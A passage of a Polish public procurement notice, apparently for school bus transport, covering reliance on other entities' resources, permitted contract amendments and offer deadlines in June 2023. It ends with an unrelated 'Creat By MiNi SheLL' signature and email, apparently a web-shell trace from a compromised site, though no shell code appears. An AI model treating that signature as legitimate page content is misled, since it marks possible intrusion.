zasoby zdolności techniczne lub<br/>zawodowe, pozwalają na wykazanie przez wykonawcę spełniania warunku/warunków udziału w postępowaniu oraz zbada,<br/>czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem wykonawcy w części 6<br/>SWZ;<br/>3) w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy mogą<br/>polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do<br/>realizacji których te zdolności są wymagane.<br/>5. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w ust. 4 pkt 1 potwierdza, że stosunek łączy<br/>wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w<br/>szczególności:<br/>1) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje<br/>roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/>6. Jeżeli zdolności techniczne lub zawodowe, podmiotu udostępniającego zasoby nie potwierdzają spełniania przez<br/>wykonawcę warunku/warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia,<br/>zamawiający żąda, aby wykonawca w terminie określonym przez zamawiającego zastąpił ten podmiot innym podmiotem lub<br/>podmiotami albo wykazał, że samodzielnie spełnia warunek/warunki udziału w postępowaniu.<br/>Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności podmiotów udostępniających<br/>zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach podmiotów udostępniających<br/>zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której<br/>dokonano wyboru Wykonawcy w przypadku wystąpienia okoliczności wymienionych w art. 455 ustawy Pzp.<br/>2. Na podstawie art. 455 ust. 1 pkt 1ustawy Pzp Zamawiający przewiduje możliwość zmian<br/>postanowień zawartej umowy w stosunku do treści oferty Wykonawcy, w następującym zakresie:<br/>1) Zmiany wynagrodzenia Wykonawcy w przypadku:<br/>a) zmiany stawki podatku od towarów i usług,<br/>2) zmiany zakresu lub sposobu wykonywania któregokolwiek świadczenia Wykonawcy<br/>objętego przedmiotem umowy w razie zmiany przepisów prawa powszechnie<br/>obowiązującego lub prawa miejscowego w zakresie niezbędnym do dostosowania umowy<br/>do warunków świadczenia usług wynikających ze zmienionych przepisów prawa;<br/>3) zmiany w zakresie Podwykonawcy, po spełnieniu warunków określonych w § 10 umowy<br/>w przypadku, gdy Wykonawca powierzy Podwykonawcy do wykonania część zamówienia,<br/>którą zgodnie z ofertą miał wykonać osobiście lub gdy Wykonawca wykona osobiście część<br/>zamówienia, którą zgodnie z ofertą miał powierzyć do wykonania Podwykonawcy lub gdy<br/>następuje zmiana Podwykonawcy, na którego zdolnościach polegał Wykonawca ubiegając<br/>się o zawarcie umowy.<br/>4) zmiany terminu wykonania przedmiotu umowy, w przypadku:<br/>a) wystąpienia okoliczności spowodowanych siłą wyższą, w tym wystąpienia zdarzenia<br/>losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć,<br/>w tym zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem<br/>szkody w znacznych rozmiarach np. pożar, zalanie, zamieszki, klęska żywiołowa, stan<br/>nadzwyczajny, stan zagrożenia epidemicznego, stan epidemii, o ile wyżej wymienione<br/>okoliczności mają charakter obiektywny,b) gdy wystąpi brak możliwości wykonywania usługi z powodu niedopuszczenia do ich<br/>wykonywania lub ich wstrzymania przez uprawniony organ, z przyczyn niezależnych<br/>od Wykonawcy,<br/>c) zmiany po upływie terminu składania ofert powszechnie obowiązujących przepisów<br/>prawa, które miały wpływ na możliwość wykonania umowy w terminie w niej ustalonym,<br/>d) konieczności zachowania ciągłości usługi do czasu wyłonienia kolejnego wykonawcy<br/>usługi będącej przedmiotem umowy;<br/>3. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu Stron wyrażoną w drodze aneksu do<br/>umowy pod rygorem nieważności.<br/>4. Zmianie podlegają także wszystkie nieistotne postanowienia w stosunku do treści oferty, a także inne nieistotne zmiany,<br/>które nie stanowią zmiany umowy i nie jest wymagane zawarcie aneksu do umowy, a jedynie niezwłoczne pisemne<br/>zawiadomienie drugiej Strony, w tym między innymi:<br/>1) zmiana danych teleadresowych Stron;<br/>2) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy;<br/>3) zmiana Podwykonawcy określonego w ofercie Wykonawcy, po spełnieniu warunków<br/>określonych w § 10 umowy;<br/>4) zmianą osób skierowanych przez Wykonawcę do realizacji przedmiotu umowy.<br/>5) zmiana rozkłady jazdy autobusów.<br/>5. W sytuacji gdy łączna liczba zakupionych biletów na dany miesiąc będzie wynosiła 50% lub mniej w stosunku do<br/>szacunkowej łącznej liczby dowożonych uczniów, o której mowa w § 6 ust. 10 umowy, wykonawcy przysługuje prawo do<br/>dostosowania ilości autobusów i osób skierowanych do realizacji zamówienia do liczby przewożonych osób przy<br/>zachowaniu postanowień umowy wynikających z § 6 ust. 10 z zastrzeżeniem ust. 6 i 7;<br/>6. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może<br/>wyrazić zgodę, nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.<br/>7. Zamawiający może nie wyrazić zgody na dokonanie zmian postanowień Umowy, jeśli<br/>proponowana zmiana może wpłynąć na opóźnienie, obniżenie jakości wykonywanych prac<br/>lub zwiększenie kosztów wykonania Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-06-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy na Platformie e-Zamówienia. https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-06-23 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com